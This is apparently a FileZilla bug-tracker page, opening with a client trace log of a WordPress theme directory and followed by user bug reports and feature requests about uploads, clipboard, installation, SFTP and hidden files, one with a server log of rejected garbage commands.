Session resumed 11:42:17 Trace: Protocol: TLS1.2, Key exchange: ECDHE-RSA, Cipher: AES-256-GCM, MAC: AEAD 11:42:17 Trace: CTransferSocket::OnConnect 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CTransferSocket::OnReceive(), m_transferMode=0 11:42:17 Listing: type=cdir;sizd=4096;modify=20170725140850;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2ba3; . 11:42:17 Listing: type=pdir;sizd=4096;modify=20170824161115;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g14b697d; .. 11:42:17 Listing: type=file;size=641;modify=20160503050642;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b3a; 404.php 11:42:17 Listing: type=file;size=15129;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b3b; _LICENSE.txt 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050644;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2ba5; anps-framework 11:42:17 Listing: type=file;size=840;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b43; archive.php 11:42:17 Listing: type=file;size=5400;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b45; attachment.php 11:42:17 Listing: type=file;size=424;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b8c; author.php 11:42:17 Listing: type=file;size=818;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b8e; category.php 11:42:17 Listing: type=file;size=3669;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b90; comments.php 11:42:17 Listing: type=file;size=3999;modify=20160503050642;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b94; content-blog-grid.php 11:42:17 Listing: type=file;size=2202;modify=20160503050644;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3b96; content-blog-masonry.php 11:42:17 Listing: type=file;size=2487;modify=20160503050644;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3bc4; content-columns.php 11:42:17 Listing: type=file;size=6764;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3bc6; content-single-blog.php 11:42:17 Listing: type=file;size=4831;modify=20160503050644;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3bc7; content-single.php 11:42:17 Listing: type=file;size=4163;modify=20160503050642;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3bc9; content.php 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050642;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2ba6; css 11:42:17 Listing: type=file;size=40;modify=20160503050641;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3bf0; custom.css 11:42:17 Listing: type=file;size=21167;modify=20170822141035;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3bf1; error_log 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050640;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2ba7; fonts 11:42:17 Listing: type=file;size=1359;modify=20170824063240;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c21; footer.php 11:42:17 Listing: type=file;size=29283;modify=20160503050642;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c22; functions.php 11:42:17 Listing: type=file;size=1905;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c24; header.php 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050640;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2ba8; images 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050642;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2ba9; includes 11:42:17 Listing: type=file;size=2429;modify=20170725004153;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c28; index.php 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050641;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2baa; js 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050642;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2bab; languages 11:42:17 Listing: type=file;size=608;modify=20160503050644;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c29; page.php 11:42:17 Listing: type=file;size=0;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c2a; readme.txt 11:42:17 Listing: type=file;size=24131;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c2b; rtl.css 11:42:17 Listing: type=file;size=288609;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c2c; screenshot.png 11:42:17 Listing: type=file;size=753;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c36; search.php 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050643;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2bac; shortcodes 11:42:17 Listing: type=file;size=4556;modify=20160503050641;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c37; sidebar-footer.php 11:42:17 Listing: type=file;size=1131;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c39; sidebar-secondary.php 11:42:17 Listing: type=file;size=7210;modify=20160503050643;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c3a; sidebar.css 11:42:17 Listing: type=file;size=5196;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c3c; single-portfolio.php 11:42:17 Listing: type=file;size=2452;modify=20160503050644;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c3e; single.php 11:42:17 Listing: type=file;size=751;modify=20160503050644;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c3f; slider.js 11:42:17 Listing: type=file;size=710;modify=20160503050640;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c40; style.css 11:42:17 Listing: type=file;size=738;modify=20160503050644;UNIX.mode=0644;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d3c41; tag.php 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050641;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2bad; templates 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050640;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2bae; vc_templates 11:42:17 Listing: type=dir;sizd=4096;modify=20160503050640;UNIX.mode=0755;UNIX.uid=1080;UNIX.gid=1083;unique=fd01g15d2baf; woocommerce 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CTransferSocket::OnReceive(), m_transferMode=0 11:42:17 Trace: CTransferSocket::TransferEnd(1) 11:42:17 Trace: CFtpControlSocket::TransferEnd() 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 226-Options: -a -l 11:42:17 Trace: CTlsSocketImpl::OnRead() 11:42:17 Trace: CFtpControlSocket::OnReceive() 11:42:17 Response: 226 45 matches total 11:42:17 Trace: CFtpRawTransferOpData::ParseResponse() in state 7 11:42:17 Trace: CFtpControlSocket::ResetOperation(0) 11:42:17 Trace: CControlSocket::ResetOperation(0) 11:42:17 Trace: CControlSocket::ParseSubcommandResult(0) 11:42:17 Trace: CFtpListOpData::SubcommandResult() in state 3 11:42:17 Trace: CFtpControlSocket::ResetOperation(0) 11:42:17 Trace: CControlSocket::ResetOperation(0) 11:42:17 Status: Directory listing of "/public_html/wp-content/themes/accounting" successful 11:42:17 Trace: CFileZillaEnginePrivate::ResetOperation(0) |
|||||
#11377 | File allegedly uploaded to remote site not actually there | Bug report | normal | FileZilla Client | rejected | |
Description |
I wanted to split a remote file V.htm into two, V1.htm and V2.htm, and then replace the original V.htm with "See V1.htm and V2.htm". That meant opening local V twice (in NotePad), to edit into V1 and V2, and then creating a new local V. V1 and V2 uploaded to remote just fine, but my attempt to upload new V went badly wrong. Even though FileZilla reported the transfer of V as going okay (several times) and showed remote V as exactly the same as local new V, my website resolutely delivered old V to all comers. Something had got stuck in a local FileZilla buffer or cache, presumably due to my folly. Sorting that out required a huge hassle of hunting for file copies, deleting, using different names, rebooting etc. |
|||||
#11379 | Clipboard failure | Bug report | normal | FileZilla Client | worksforme | |
Description |
I have tried to "Copy URL(s) to clipboard" for files in the ftp listing window, via the Context menu and I get an error message that says " Failed to put data in Clipboard (error -2147221040: openClipboard Failed) " Is this something I am doing wrong? in the |
|||||
#11380 | autoban after configurable number of bad commands (command unrecognized) | Feature request | normal | FileZilla Server | rejected | |
Description |
There are hackers trying to get into my FileZilla server by entering bad command after bad command. I've attached an example from my FZ server log below. A good feature would be the ability to log out and autoban the IP address after a certain number of failed commands. First I believe this would be a good security feature. Second, this would lower the load on the server while legitimate activity was ongoing. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> Connected on port 21, sending welcome message... (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 220 Welcome (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> " (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 4õÜk£T®áR¸m>yN›– (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> øq.¤2/Š9Rs‹ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> ˆÀ0À,À(À$ÀÀ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> £ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> Ÿ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> k (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> j (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 9 (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 8 (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> ˆ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> ‡À2À.À*À&ÀÀ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> = (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 5 (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> „ÀÀ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> À (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> À (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> À/À+À'À#ÀÀ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> ¢ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> ž (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> g (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> @ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 3 (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 2 (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> š (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> ™ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> E (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> DÀ1À-À)À%ÀÀ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> œ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> < (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> / (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> – (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> AÀÀÀÀ (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> m (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 4 (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 2 (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> # (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> 500 Syntax error, command unrecognized. (000038) 8/28/2017 2:36:22 AM - (not logged in) (118.193.31.179)> disconnected. |
|||||
#11381 | Version 3.27.1 Fails many File Uploads - says 1K file is 822,202 bytes and Timeouts. | Bug report | normal | FileZilla Client | rejected | |
Description |
I am using the latest version of Filezilla - downloaded last night I have a problem updating WordPress to 4.8.1 I'm using Filezilla to upload the unzipped folders & etc. In the 'includes' folder, I find about 1/2 way through, I get transfer lockups that last 20 seconds, causing the agent to drop out and then automatically log back in. The file size of the locked up files is always 822,202 bytes. (attached example is only 1Kb - so the error is in either the latest Filezilla, or in my Server VPC FTP. I sent this report to my Server and he says no issue their end) I shows a 'failed file transfer' and it looks to me like those files don't upload. Is it me or is there an issue? I logged as admin at my blog www.chrisdcorran.com and that was OK I went to the Site and it was OK. I'm worried I am corrupting about 1 in four files... Files are attached: |
|||||
#11382 | Show dot files on Windows file system | Bug report | normal | FileZilla Client | worksforme | |
Description |
I currently have the problem, that I'm unable to get Filezilla to show dot files. I'm unable to show my .htaccess files on my file system. When I use the Windows file explorer. The dot files are shown. I don't have any file filter enabled and I toggled the "server > show hidden files" but this is also not working for the windows file system. |
|||||
#11383 | Version 3.27.1 - Silent Installation - /S | Bug report | normal | FileZilla Client | worksforme | |
Description |
FileZilla_3.27.1_win64-setup_bundled3.exe /S This doesn't appear to work for the 64bit version on Windows 7 - the default install begins - where Licence agreement ect. is required to be clicked on 'Next'. I have tried the exact same /S with an earlier version on the same machine - completes perfectly |
|||||
#11386 | FileZilla crashes, when trying to edit the password field while adding a new server in the server settings | Bug report | normal | FileZilla Client | fixed | |
Description |
Filezilla: 3.27.1 openSUSE Tumbleweed 20170830, Kernel 4.11.8 Settings: Using Masterpassword I am not sure, if the version-upgrade or using a master-password is the last relevant change I made, since filezilla crashes. Steps to reproduce (everytime):
=> filezilla crashes |
|||||
#11388 | I suspect fz uses a case-sensitive domain. domain RFC uses case insensitivity for domain | Bug report | normal | libfilezilla | invalid | |
Description |
I suspect fz uses a case-sensitive domain. domain RFC uses case insensitivity for domain. I have been unable to login with fz for about 1 month. hosting company says everything OK. please check RFC and act accordingly. there are multiple domain RFC's and one of them is considered more up-to-date. try this with a web browser for proof (protocol is case-sensitive): FILEZILLA-PROJECT.ORG username@… - what does the FTP spec say as to case insensitivity or case-sensitivity for the domain part? also, why is fz compiled with -g (debug symbols)? -s -O2 would speed up the code. if it's of any interest, FileZilla Client Version: 3.27.1 Build information:
Linked against:
Operating system:
|
|||||
#11389 | SFTP needed | Bug report | normal | FileZilla Client | worksforme | |
Description |
SFTP is required by my hosting company. only FTPS over SSH is provided. please provide FTPS again. it got dropped. using latest fz on 64-bit OS. |
|||||
#11390 | error | Bug report | normal | FileZilla Client | rejected | |
Description |
No document element found at offset 15755 |
|||||
#11391 | Site manager doesn't remember window size | Bug report | normal | FileZilla Client | rejected | |
Description |
I see this problem has been notified many times in the past #1324 #2601 #2688 #2695 and in #2688 was marked as solved in 3.0.0rc2. Unfortunately I still have such problem. Version: 3.15.0.2 Build information:
Linked against:
Operating system:
|
|||||
#11402 | SFTP file copy to and from Raspbian Stretch when running on Mac-OS | Bug report | normal | FileZilla Client | worksforme | |
Description |
With the latest version of Raspbian Stretch (September 2017), I'm unable to SFTP to or from it when running the Mac client. It seems fine with other FTP packages, and it's fine on the Windows client run on the same MacBook's virtual Windows machine. The authentication log at /var/log/auth.log on the Raspberry Pi recorded this: Sep 20 12:55:59 P100000 login[537]: pam_unix(login:session): session opened for user pi by LOGIN(uid=0) Sep 20 12:55:59 P100000 systemd-logind[327]: New session c1 of user pi. Sep 20 12:55:59 P100000 systemd: pam_unix(systemd-user:session): session opened for user pi by (uid=0) Sep 20 12:55:59 P100000 lightdm: pam_unix(lightdm-autologin:session): session opened for user pi by (uid=0) Sep 20 12:55:59 P100000 systemd-logind[327]: New session c2 of user pi. Sep 20 12:56:02 P100000 polkitd(authority=local): Registered Authentication Agent for unix-session:c2 (system bus name :1.13 [lxpolkit], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8) Sep 20 12:56:11 P100000 sshd[876]: Accepted password for pi from 10.25.1.155 port 53806 ssh2 Sep 20 12:56:11 P100000 sshd[876]: pam_unix(sshd:session): session opened for user pi by (uid=0) Sep 20 12:56:11 P100000 systemd-logind[327]: New session c3 of user pi. Sep 20 12:56:39 P100000 sshd[890]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.25.1.155 user=pi Sep 20 12:56:41 P100000 sshd[890]: Failed password for pi from 10.25.1.155 port 53809 ssh2 Sep 20 12:56:43 P100000 sshd[890]: Connection closed by 10.25.1.155 port 53809 [preauth] This problem didn't seem to occur with the previous version of Raspbian Stretch (August 2017). And, as I said, it doesn't seem to affect the Windows client. Regards Simon |
|||||
#11405 | FTP Issue | Bug report | normal | FileZilla Client | rejected | |
Description |
Hello, We have a file that has certain characters. These characters are getting stripped when we FTP the file. I have tried Binary, as well as ASCII. Not sure what else to do. Thanks. |
|||||
#11406 | Copy URL(s) to clipboard option is including "anonymous@" in the URL | Bug report | normal | FileZilla Client | worksforme | |
Description |
PROBLEM: The copied/pasted URL contains "anonymous@" as part of the URL. This is not necessary and just makes the URL longer when passing it on to other people. e.g. ftp://anonymous@ftp.yourwebsite.com/pub/folder/alpha/program/programname.zip |
|||||
#11408 | Listing AS400 File Members | Other | normal | FileZilla Client | wontfix | |
Description |
Hello... Thanks to a few past tickets I was able to get the FILE listing of an AS400 library. What I cannot do is list the members of a file. Is there a way to do this? Thanks, M |
|||||
#11409 | Close FileZille Once not working | Bug report | normal | FileZilla Client | fixed | |
Description |
Hi I asked for a new feature which I understand you had included in the new release I downloaded today. I.e. when updating a large file / files I wanted fZ to close itself afterwards automatically. However after setting this option FZ kept closing itself. The new feature would allow FZ to be set to CLOSE ONCE only. I tried it out now and could not activate any of the options in the drop down menue. I.e. only NONE works. Small bug I am sure. Hopefully this will be fixed asap as this new feature is GREAT and will be used by me and others a lot. |
|||||
#11411 | Version 3.28.0 Prevents FTP Uploads | Bug report | normal | FileZilla Client | worksforme | |
Description |
